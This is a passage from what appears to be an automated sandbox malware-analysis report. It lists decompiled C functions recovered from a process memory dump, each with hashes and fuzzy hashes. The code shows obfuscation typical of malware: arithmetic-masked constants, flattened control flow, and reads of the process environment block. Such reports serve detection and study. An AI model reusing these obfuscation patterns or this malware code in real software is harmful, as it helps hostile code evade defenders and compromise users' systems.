                                          									goto L11;
                                          								} else {
                                          									_t154 = 0xfd0cdc7;
                                          									continue;
                                          								}
                                          							}
                                          						}
                                          						L14:
                                          						return _t179;
                                          					}
                                          					_push(_t154);
                                          					_push(_t154);
                                          					_t179 = E006C8736(_t178 + _t178);
                                          					if(_t179 == 0) {
                                          						_t154 = 0x710c028;
                                          						goto L11;
                                          					} else {
                                          						_t154 = 0x1eddc4e8;
                                          						continue;
                                          					}
                                          					goto L14;
                                          					L11:
                                          				} while (_t154 != 0x710c028);
                                          				goto L14;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Similarity
                                          • Opcode ID: 54c5c56bf0af8cda16f7e28256bcac62e124157df4d0d3f995edbfb0d9cf3b88
                                          • Instruction ID: 4647f6a6ecc69c7b9de4a65c37e4de3bf81da20ad6a306be82e5ffb4466ca8a3
                                          • Opcode Fuzzy Hash: 54c5c56bf0af8cda16f7e28256bcac62e124157df4d0d3f995edbfb0d9cf3b88
                                          • Instruction Fuzzy Hash: 44617C72D01309EBDF14CFA5DD859EEBBB2FF48324F248219E512B6290D7B54A418F90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 98%
                                          			E006CF444(signed int __ecx) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				void* _t120;
                                          				signed int _t126;
                                          				signed int _t128;
                                          				signed int _t129;
                                          				signed int _t130;
                                          				signed int _t131;
                                          				intOrPtr* _t149;
                                          				intOrPtr _t152;
                                          				intOrPtr _t154;
                                          				void* _t159;
                                          				void* _t160;
                                          
                                          				_t128 = __ecx;
                                          				_t152 =  *0x6dca24; // 0x0
                                          				while(_t152 != 0) {
                                          					if( *((intOrPtr*)(_t152 + 0x28)) != 0) {
                                          						 *((intOrPtr*)(_t152 + 4))( *((intOrPtr*)(_t152 + 0x28)), 0xb, 0);
                                          					}
                                          					_t152 =  *((intOrPtr*)(_t152 + 0x2c));
                                          				}
                                          				_t129 = _t128 | 0xffffffff;
                                          				_pop(_t153);
                                          				_t160 = _t159 - 0x2c;
                                          				_v8 = 0xa05a;
                                          				_v8 = _v8 | 0x4de4d3b6;
                                          				_t126 = _t129;
                                          				_t149 = 0x6dca24;
                                          				_t130 = 0x77;
                                          				_v8 = _v8 / _t130;
                                          				_v8 = _v8 >> 0xa;
                                          				_v8 = _v8 ^ 0x000036e5;
                                          				_v44 = 0x8c67;
                                          				_t131 = 0x67;
                                          				_v44 = _v44 * 0x22;
                                          				_v44 = _v44 ^ 0x00129d81;
                                          				_v24 = 0xef;
                                          				_v24 = _v24 + 0xffff82ae;
                                          				_v24 = _v24 >> 4;
                                          				_v24 = _v24 ^ 0x0fffc315;
                                          				_v12 = 0xac64;
                                          				_v12 = _v12 >> 6;
                                          				_v12 = _v12 / _t131;
                                          				_v12 = _v12 ^ 0x56eede11;
                                          				_v12 = _v12 ^ 0x56ee9803;
                                          				_v32 = 0x5470;
                                          				_v32 = _v32 >> 1;
                                          				_v32 = _v32 << 7;
                                          				_v32 = _v32 ^ 0x00150b15;
                                          				_v36 = 0xc745;
                                          				_v36 = _v36 >> 0xb;
                                          				_v36 = _v36 >> 8;
                                          				_v36 = _v36 ^ 0x00006261;
                                          				_v16 = 0x5384;
                                          				_v16 = _v16 | 0x59782290;
                                          				_v16 = _v16 << 2;
                                          				_v16 = _v16 + 0xffff2741;
                                          				_v16 = _v16 ^ 0x65e0bd40;
                                          				_v20 = 0x334d;
                                          				_v20 = _v20 | 0xb04f2549;
                                          				_v20 = _v20 + 0xf20e;
                                          				_v20 = _v20 + 0x9932;
                                          				_v20 = _v20 ^ 0xb050c5c9;
                                          				_v40 = 0xe415;
                                          				_v40 = _v40 * 0x55;
                                          				_v40 = _v40 + 0x2e22;
                                          				_v40 = _v40 ^ 0x004bf03f;
                                          				_v48 = 0x3d8d;
                                          				_v48 = _v48 << 1;
                                          				_v48 = _v48 ^ 0x00006d20;
                                          				_v28 = 0x48e5;
                                          				_v28 = _v28 << 3;
                                          				_v28 = _v28 << 0xe;
                                          				_v28 = _v28 ^ 0x91ca0000;
                                          				_t154 =  *0x6dca24; // 0x0
                                          				while(_t154 != 0) {
                                          					if( *((intOrPtr*)(_t154 + 0x28)) == 0) {
                                          						L10:
                                          						 *_t149 =  *((intOrPtr*)(_t154 + 0x2c));
                                          						_t120 = E006CF536(_v20, _v40, _v48, _t154);
                                          					} else {
                                          						_t120 = E006D086F(_v8, _v44,  *((intOrPtr*)(_t154 + 0x1c)), _t126, _v24);
                                          						_t160 = _t160 + 0xc;
                                          						if(_t120 != _v28) {
                                          							_t112 = _t154 + 0x2c; // 0x2c
                                          							_t149 = _t112;
                                          						} else {
                                          							 *((intOrPtr*)(_t154 + 4))( *((intOrPtr*)(_t154 + 0x28)), 0, 0);
                                          							E006D422C(_v12,  *((intOrPtr*)(_t154 + 0x28)), _v32);
                                          							E006D4F7D(_v36, _v16,  *((intOrPtr*)(_t154 + 0x1c)));
                                          							goto L10;
                                          						}
                                          					}
                                          					_t154 =  *_t149;
                                          				}
                                          				return _t120;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Similarity
                                          • Opcode ID: 3f6fcbfd5261f3a299c14bf80797ff3f12eb9b0798c91cd1b17479c38f04f41a
                                          • Instruction ID: f752a57cdc6611a19d9e8ad4ad4acdd1cf0a3eade9f917ebc28231f864c1e8e0
                                          • Opcode Fuzzy Hash: 3f6fcbfd5261f3a299c14bf80797ff3f12eb9b0798c91cd1b17479c38f04f41a
                                          • Instruction Fuzzy Hash: AB514532D00709DBDB18CFA5D94AAEEFBB2FB08314F208159D516762A0C7B46A45CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E006D71EF(void* __edx, void* __eflags, intOrPtr _a4) {
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				char _v52;
                                          				intOrPtr _v56;
                                          				char _v60;
                                          				char _v68;
                                          				char _v144;
                                          				void* __ecx;
                                          				void* _t94;
                                          				void* _t106;
                                          				void* _t108;
                                          				void* _t110;
                                          				void* _t112;
                                          				void* _t114;
                                          				signed int _t120;
                                          				void* _t142;
                                          				void* _t144;
                                          				void* _t146;
                                          				void* _t147;
                                          
                                          				_t147 = __eflags;
                                          				_push(_a4);
                                          				_push(__edx);
                                          				E006C602B(_t94);
                                          				_v20 = 0xa5d0;
                                          				_v20 = _v20 | 0x3487ecbd;
                                          				_v20 = _v20 + 0xffff03d0;
                                          				_t142 = 0;
                                          				_v20 = _v20 + 0x3a47;
                                          				_v20 = _v20 ^ 0x348731c7;
                                          				_v28 = 0xdd31;
                                          				_v28 = _v28 << 0x10;
                                          				_v28 = _v28 | 0x8f0862d8;
                                          				_v28 = _v28 ^ 0xdf391de9;
                                          				_v16 = 0xb0e;
                                          				_v16 = _v16 << 4;
                                          				_v16 = _v16 << 0xa;
                                          				_t120 = 0x14;
                                          				_v16 = _v16 * 0x76;
                                          				_v16 = _v16 ^ 0x461d447c;
                                          				_v12 = 0xa74;
                                          				_v12 = _v12 << 0xc;
                                          				_v12 = _v12 + 0x835b;
                                          				_v12 = _v12 >> 1;
                                          				_v12 = _v12 ^ 0x0053bc14;
                                          				_v36 = 0xa6cf;
                                          				_v36 = _v36 << 1;
                                          				_v36 = _v36 ^ 0x000104b7;
                                          				_v24 = 0x4d22;
                                          				_v24 = _v24 >> 6;
                                          				_v24 = _v24 + 0xef2f;
                                          				_v24 = _v24 ^ 0x0000ed15;
                                          				_v44 = 0x3931;
                                          				_v44 = _v44 * 0x11;
                                          				_v44 = _v44 ^ 0x00039362;
                                          				_v40 = 0xec47;
                                          				_v40 = _v40 ^ 0x28f00c99;
                                          				_v40 = _v40 ^ 0x28f09017;
                                          				_v32 = 0x2800;
                                          				_v32 = _v32 / _t120;
                                          				_v32 = _v32 ^ 0x971b94ed;
                                          				_v32 = _v32 ^ 0x971b9d0a;
                                          				E006D50F2( &_v144, _v20, _v28, _v16, __edx);
                                          				_t146 = _t144 + 0x18;
                                          				L13:
                                          				if(E006CB055(_v12, _v36, _t147,  &_v144,  &_v68) != 0) {
                                          					_t106 = E006C1280(_v24, _v44, _v40,  &_v60,  &_v68, _v32);
                                          					_t146 = _t146 + 0x10;
                                          					__eflags = _t106;
                                          					if(__eflags != 0) {
                                          						_t108 = _v56 - 1;
                                          						__eflags = _t108;
                                          						if(_t108 == 0) {
                                          							E006C6754(_v60,  &_v52);
                                          						} else {
                                          							_t110 = _t108 - 1;
                                          							__eflags = _t110;
                                          							if(_t110 == 0) {
                                          								E006C8F78(_v60,  &_v52);
                                          							} else {
                                          								_t112 = _t110 - 1;
                                          								__eflags = _t112;
                                          								if(_t112 == 0) {
                                          									E006D26F5(_v60,  &_v52);
                                          								} else {
                                          									_t114 = _t112 - 1;
                                          									__eflags = _t114;
                                          									if(_t114 == 0) {
                                          										E006C4A35(_v60,  &_v52);
                                          									} else {
                                          										__eflags = _t114 == 6;
                                          										if(_t114 == 6) {
                                          											E006C69A0(_v60,  &_v52);
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          						_t142 = _t142 + 1;
                                          						__eflags = _t142;
                                          					}
                                          					goto L13;
                                          				}
                                          				return _t142;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Similarity
                                          • Opcode ID: 9e60bb529e95b2fd998923d9e3cb4c74cf202ff18c9249fb7b0ce3a5257b475f
                                          • Instruction ID: 9a33d85994f8d1a9d5f336c97929db9e89419da6d911d50a2e45df3757e419d4
                                          • Opcode Fuzzy Hash: 9e60bb529e95b2fd998923d9e3cb4c74cf202ff18c9249fb7b0ce3a5257b475f
                                          • Instruction Fuzzy Hash: 12514971D0420EABDF08CFA0D8459EEBBB6FF44304F10815AD411B7290E7B85A49CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E006D8ADC(intOrPtr* __ecx) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				char _v304;
                                          				char _t109;
                                          				void* _t115;
                                          				signed int _t117;
                                          				signed int _t118;
                                          				signed int _t119;
                                          				char* _t120;
                                          				intOrPtr* _t139;
                                          				void* _t140;
                                          
                                          				_v44 = 0xbe2c;
                                          				_v44 = _v44 | 0x84c59b93;
                                          				_v44 = _v44 ^ 0x84c5dc14;
                                          				_v12 = 0x6fb6;
                                          				_v12 = _v12 << 0xc;
                                          				_t139 = __ecx;
                                          				_t117 = 0x2e;
                                          				_v12 = _v12 / _t117;
                                          				_v12 = _v12 + 0xcda3;
                                          				_v12 = _v12 ^ 0x0027e688;
                                          				_v28 = 0xcabb;
                                          				_v28 = _v28 + 0xd310;
                                          				_v28 = _v28 | 0x3c203c9f;
                                          				_v28 = _v28 ^ 0x3c2189d4;
                                          				_v36 = 0x4eab;
                                          				_v36 = _v36 | 0x84b19700;
                                          				_v36 = _v36 ^ 0x84b1b180;
                                          				_v8 = 0xd8ee;
                                          				_v8 = _v8 + 0xffff63d4;
                                          				_v8 = _v8 ^ 0xfc264e39;
                                          				_v8 = _v8 ^ 0x6fc556fb;
                                          				_v8 = _v8 ^ 0x93e330d5;
                                          				_v20 = 0x5c82;
                                          				_v20 = _v20 | 0x7a047e0a;
                                          				_v20 = _v20 << 5;
                                          				_t118 = 0x1b;
                                          				_v20 = _v20 * 0x43;
                                          				_v20 = _v20 ^ 0xe5a3df6f;
                                          				_v40 = 0x7499;
                                          				_v40 = _v40 >> 8;
                                          				_v40 = _v40 ^ 0x0000130c;
                                          				_v16 = 0x5702;
                                          				_v16 = _v16 << 8;
                                          				_v16 = _v16 << 6;
                                          				_v16 = _v16 + 0xffffa72f;
                                          				_v16 = _v16 ^ 0x15c040b7;
                                          				_v32 = 0x67e1;
                                          				_v32 = _v32 / _t118;
                                          				_v32 = _v32 ^ 0x8e6cf5d6;
                                          				_v32 = _v32 ^ 0x8e6ccf96;
                                          				_v24 = 0x77;
                                          				_t119 = 0x69;
                                          				_v24 = _v24 * 0x25;
                                          				_t120 =  &_v304;
                                          				_v24 = _v24 / _t119;
                                          				_v24 = _v24 ^ 0x863bea64;
                                          				_v24 = _v24 ^ 0x863bfaf8;
                                          				while(1) {
                                          					_t109 =  *_t139;
                                          					if(_t109 == 0) {
                                          						break;
                                          					}
                                          					if(_t109 == 0x2e) {
                                          						 *_t120 = 0;
                                          					} else {
                                          						 *_t120 = _t109;
                                          						_t120 = _t120 + 1;
                                          						_t139 = _t139 + 1;
                                          						continue;
                                          					}
                                          					L6:
                                          					_t140 = E006CF22A(_v44, _v12,  &_v304, _v28);
                                          					if(_t140 != 0) {
                                          						L8:
                                          						_push(E006D8634(_v40, _t139 + 1, _v16) ^ 0x762b677b);
                                          						_push(_t140);
                                          						return E006D0126(_v32, _v24);
                                          					}
                                          					_t115 = E006D4AAF( &_v304, _v36, _v8, _v20);
                                          					_t140 = _t115;
                                          					if(_t140 != 0) {
                                          						goto L8;
                                          					}
                                          					return _t115;
                                          				}
                                          				goto L6;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Similarity
                                          • Opcode ID: 94b0c3d6e61e61ea0f224150d988a8d30d783f5daa19532cd6a56022687b62a3
                                          • Instruction ID: 04131d6f52434e2755b9ca244264e18609d9f21dc8a1f44ce95f7d4b1af493c7
                                          • Opcode Fuzzy Hash: 94b0c3d6e61e61ea0f224150d988a8d30d783f5daa19532cd6a56022687b62a3
                                          • Instruction Fuzzy Hash: 09513371C0121ADFDF59CFA0D94A9EEBBB2FB44314F20819AC111B62A0D7B91B45CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 89%
                                          			E006C48BD(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				unsigned int _v16;
                                          				unsigned int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				intOrPtr _v40;
                                          				intOrPtr _v44;
                                          				intOrPtr _v48;
                                          				void* _t84;
                                          				intOrPtr* _t95;
                                          				signed int _t103;
                                          				signed int _t104;
                                          				void* _t105;
                                          				signed int _t108;
                                          				void* _t122;
                                          
                                          				_t122 = __ecx;
                                          				_push(0x6dc110);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E006C602B(_t84);
                                          				_v48 = 0x61abc6;
                                          				_v44 = 0;
                                          				_v40 = 0;
                                          				_v20 = 0x3115;
                                          				_v20 = _v20 >> 0xf;
                                          				_v20 = _v20 >> 0xb;
                                          				_v20 = _v20 ^ 0x0000604b;
                                          				_v16 = 0xb2e9;
                                          				_v16 = _v16 >> 0xf;
                                          				_v16 = _v16 + 0x4f02;
                                          				_v16 = _v16 ^ 0x00000d08;
                                          				_v8 = 0x47ff;
                                          				_v8 = _v8 + 0xba3e;
                                          				_t103 = 0x68;
                                          				_v8 = _v8 / _t103;
                                          				_t104 = 0x36;
                                          				_v8 = _v8 * 0x26;
                                          				_v8 = _v8 ^ 0x00006b48;
                                          				_v12 = 0x7283;
                                          				_v12 = _v12 + 0xffffff70;
                                          				_v12 = _v12 >> 5;
                                          				_v12 = _v12 | 0x62bbfeca;
                                          				_v12 = _v12 ^ 0x62bbef9f;
                                          				_v32 = 0x955e;
                                          				_v32 = _v32 + 0x386b;
                                          				_v32 = _v32 ^ 0x0000cdee;
                                          				_v36 = 0x2587;
                                          				_v36 = _v36 ^ 0xc63d9950;
                                          				_v36 = _v36 ^ 0xc63dc5f3;
                                          				_v28 = 0xb9df;
                                          				_v28 = _v28 ^ 0xf1a14283;
                                          				_v28 = _v28 * 0x63;
                                          				_v28 = _v28 ^ 0x71a43d80;
                                          				_v24 = 0x4453;
                                          				_v24 = _v24 << 3;
                                          				_t105 = 0x4c;
                                          				_v24 = _v24 / _t104;
                                          				_v24 = _v24 ^ 0x00004bab;
                                          				_t95 = E006C8736(_t105);
                                          				 *0x6dca38 = _t95;
                                          				if(_t95 == 0) {
                                          					L7:
                                          					return 0;
                                          				}
                                          				_t108 =  *(_t95 + 0x3c);
                                          				 *((intOrPtr*)(_t95 + 0x14)) = 0x6dc110;
                                          				 *_t95 = 0x6dc110;
                                          				 *((intOrPtr*)(_t95 + 0x24)) = 0;
                                          				while( *((intOrPtr*)(0x6dc110 + _t108 * 8)) != 0) {
                                          					_t108 = _t108 + 1;
                                          					 *(_t95 + 0x3c) = _t108;
                                          				}
                                          				if(E006C1CFA(_v32, _t122) == 0) {
                                          					E006CF536(_v36, _v28, _v24,  *0x6dca38);
                                          					goto L7;
                                          				}
                                          				return 1;
                                          			}





















                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          • Opcode ID: 94c0028e89007bbfaedefc939d012d576b0ab8f6bcd01f6b226db4e7db1190e7
                                          • Instruction ID: 3b7e6d87bb6f2ec2800910cbf30ccbb21899a38cedd5f39882625bd949431a72
                                          • Opcode Fuzzy Hash: 94c0028e89007bbfaedefc939d012d576b0ab8f6bcd01f6b226db4e7db1190e7
                                          • Instruction Fuzzy Hash: 03414871D0120AAFDB44CFA5D9569EEBBB6FF44314F20805ED101AA290DBB44A45CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E006D67E9() {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				void* _t116;
                                          				intOrPtr* _t143;
                                          				intOrPtr _t146;
                                          				void* _t151;
                                          				void* _t152;
                                          
                                          				_t152 = _t151 - 0x2c;
                                          				_v8 = 0xa05a;
                                          				_v8 = _v8 | 0x4de4d3b6;
                                          				_push(0x77);
                                          				_t143 = 0x6dca24;
                                          				_push(0x67);
                                          				_v8 = _v8 / 0;
                                          				_v8 = _v8 >> 0xa;
                                          				_v8 = _v8 ^ 0x000036e5;
                                          				_v44 = 0x8c67;
                                          				_v44 = _v44 * 0x22;
                                          				_v44 = _v44 ^ 0x00129d81;
                                          				_v24 = 0xef;
                                          				_v24 = _v24 + 0xffff82ae;
                                          				_v24 = _v24 >> 4;
                                          				_v24 = _v24 ^ 0x0fffc315;
                                          				_v12 = 0xac64;
                                          				_v12 = _v12 >> 6;
                                          				_v12 = _v12 / 0;
                                          				_v12 = _v12 ^ 0x56eede11;
                                          				_v12 = _v12 ^ 0x56ee9803;
                                          				_v32 = 0x5470;
                                          				_v32 = _v32 >> 1;
                                          				_v32 = _v32 << 7;
                                          				_v32 = _v32 ^ 0x00150b15;
                                          				_v36 = 0xc745;
                                          				_v36 = _v36 >> 0xb;
                                          				_v36 = _v36 >> 8;
                                          				_v36 = _v36 ^ 0x00006261;
                                          				_v16 = 0x5384;
                                          				_v16 = _v16 | 0x59782290;
                                          				_v16 = _v16 << 2;
                                          				_v16 = _v16 + 0xffff2741;
                                          				_v16 = _v16 ^ 0x65e0bd40;
                                          				_v20 = 0x334d;
                                          				_v20 = _v20 | 0xb04f2549;
                                          				_v20 = _v20 + 0xf20e;
                                          				_v20 = _v20 + 0x9932;
                                          				_v20 = _v20 ^ 0xb050c5c9;
                                          				_v40 = 0xe415;
                                          				_v40 = _v40 * 0x55;
                                          				_v40 = _v40 + 0x2e22;
                                          				_v40 = _v40 ^ 0x004bf03f;
                                          				_v48 = 0x3d8d;
                                          				_v48 = _v48 << 1;
                                          				_v48 = _v48 ^ 0x00006d20;
                                          				_v28 = 0x48e5;
                                          				_v28 = _v28 << 3;
                                          				_v28 = _v28 << 0xe;
                                          				_v28 = _v28 ^ 0x91ca0000;
                                          				_t146 =  *0x6dca24; // 0x0
                                          				while(_t146 != 0) {
                                          					if( *((intOrPtr*)(_t146 + 0x28)) == 0) {
                                          						L5:
                                          						 *_t143 =  *((intOrPtr*)(_t146 + 0x2c));
                                          						_t116 = E006CF536(_v20, _v40, _v48, _t146);
                                          					} else {
                                          						_t116 = E006D086F(_v8, _v44,  *((intOrPtr*)(_t146 + 0x1c)), 0, _v24);
                                          						_t152 = _t152 + 0xc;
                                          						if(_t116 != _v28) {
                                          							_t108 = _t146 + 0x2c; // 0x2c
                                          							_t143 = _t108;
                                          						} else {
                                          							 *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 0, 0);
                                          							E006D422C(_v12,  *((intOrPtr*)(_t146 + 0x28)), _v32);
                                          							E006D4F7D(_v36, _v16,  *((intOrPtr*)(_t146 + 0x1c)));
                                          							goto L5;
                                          						}
                                          					}
                                          					_t146 =  *_t143;
                                          				}
                                          				return _t116;
                                          			}



















                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          • Opcode ID: ff905d0bc7d17e3ac5ce7355f4c6c0575f8aa6b597b35d68a6b14d3430bb42a7
                                          • Instruction ID: 346812923add76c724eb32969ba5634b7d3891c16112b81b7c5e412f4d8e2b5b
                                          • Opcode Fuzzy Hash: ff905d0bc7d17e3ac5ce7355f4c6c0575f8aa6b597b35d68a6b14d3430bb42a7
                                          • Instruction Fuzzy Hash: 16410172D0131EDBDB48CFA5D58A4DEFBB1BB14758F208059C115BA290C7B80B49CFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E006D7A0F(void* __ecx) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				void* _t43;
                                          				void* _t47;
                                          				void* _t50;
                                          				void* _t56;
                                          				void* _t57;
                                          
                                          				_t50 = __ecx;
                                          				_v16 = 0xca2c;
                                          				_v16 = _v16 ^ 0x4de68128;
                                          				_v16 = _v16 ^ 0x4de62eb9;
                                          				_v8 = 0x8c11;
                                          				_v8 = _v8 + 0x5792;
                                          				_v8 = _v8 ^ 0x1f44ca2d;
                                          				_v8 = _v8 << 0xa;
                                          				_v8 = _v8 ^ 0x10a60930;
                                          				_v28 = 0x568d;
                                          				_v28 = _v28 >> 6;
                                          				_v28 = _v28 ^ 0x00005e22;
                                          				_v24 = 0x104e;
                                          				_v24 = _v24 << 0x10;
                                          				_v24 = _v24 ^ 0x104e2f39;
                                          				_v20 = 0x2b0b;
                                          				_v20 = _v20 << 5;
                                          				_v20 = _v20 ^ 0x000512d1;
                                          				_v12 = 0x980d;
                                          				_v12 = _v12 + 0x309b;
                                          				_v12 = _v12 >> 1;
                                          				_t56 = 0;
                                          				_v12 = _v12 ^ 0x00001aed;
                                          				_t43 = 0xce8bfa4;
                                          				do {
                                          					while(_t43 != 0xce8bfa4) {
                                          						if(_t43 == 0x19c25828) {
                                          							_push(_t50);
                                          							_t47 = E006D7F1B();
                                          							_t57 = _t57 + 4;
                                          							_t56 = _t56 + _t47;
                                          							_t43 = 0x375743b0;
                                          							continue;
                                          						} else {
                                          							if(_t43 != 0x375743b0) {
                                          								goto L8;
                                          							} else {
                                          								_t56 = _t56 + E006CD64E(_v28, _v24, _v20, _t50 + 4, _v12);
                                          							}
                                          						}
                                          						L5:
                                          						return _t56;
                                          					}
                                          					_t43 = 0x19c25828;
                                          					L8:
                                          				} while (_t43 != 0x2a4614b);
                                          				goto L5;
                                          			}














                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          • Opcode ID: 362bc142d129daebced84241c2bae281a61a82d17f508644e8d31eb90b62e200
                                          • Instruction ID: 501425992d642b1e32190463288405c25e5294911723ee6015d208ddee99b2d9
                                          • Opcode Fuzzy Hash: 362bc142d129daebced84241c2bae281a61a82d17f508644e8d31eb90b62e200
                                          • Instruction Fuzzy Hash: 5D217AB1E04219ABDB54DBA4D88A4AFFBB1FB50308F68806AD505B3341E3B54B44CF92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 95%
                                          			E006D687F(void* __ecx, signed int __edx, void* __eflags) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				char _v32;
                                          				signed int _v36;
                                          				signed int _t63;
                                          				signed int _t72;
                                          
                                          				_v32 = 4;
                                          				_v8 = 0xaf15;
                                          				_v8 = _v8 << 0xf;
                                          				_v8 = _v8 >> 0xa;
                                          				_v8 = _v8 + 0x6e7b;
                                          				_v8 = _v8 ^ 0x2016511b;
                                          				_v24 = 0x477;
                                          				_v24 = _v24 + 0xffffb380;
                                          				_t72 = 0x7f;
                                          				_v24 = _v24 / _t72;
                                          				_v24 = _v24 ^ 0x02042a92;
                                          				_v20 = 0x93b6;
                                          				_v20 = _v20 * 0x30;
                                          				_v20 = _v20 ^ 0x44f1257f;
                                          				_v20 = _v20 ^ 0x44eaddee;
                                          				_v16 = 0x6bfa;
                                          				_v16 = _v16 >> 0xa;
                                          				_v16 = _v16 + 0xffff28a3;
                                          				_v16 = _v16 ^ 0xffff7b62;
                                          				_v28 = 0xaf58;
                                          				_v28 = _v28 ^ 0x6486cb7d;
                                          				_v28 = _v28 ^ 0x6486241a;
                                          				_v12 = 0x7e30;
                                          				_v12 = _v12 + 0x9611;
                                          				_v12 = _v12 << 0xd;
                                          				_v12 = _v12 ^ 0x22884747;
                                          				_t63 = E006D674B( &_v36, _v24, __ecx, _v8 | __edx, __ecx, _v20,  &_v32, _v16, _v28, _v12);
                                          				asm("sbb eax, eax");
                                          				return  ~_t63 & _v36;
                                          			}


                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fe6ba01be8fb5c0da9d2f06e75f2fa44d8968acd521b874d952cc1c4be9b7d87
                                          • Instruction ID: f51facf4caf8613b81d556fb690fe4122f72bbbf4b6852e77436e7ff642798ca
                                          • Opcode Fuzzy Hash: fe6ba01be8fb5c0da9d2f06e75f2fa44d8968acd521b874d952cc1c4be9b7d87
                                          • Instruction Fuzzy Hash: 9321E3B2D0021EABDB15CFE1C94A9EEBBB5FB14204F108299D521B6160D3B85B55CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E006CC4FF() {
                                          
                                          				return  *[fs:0x30];
                                          			}




                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                          • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                          • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

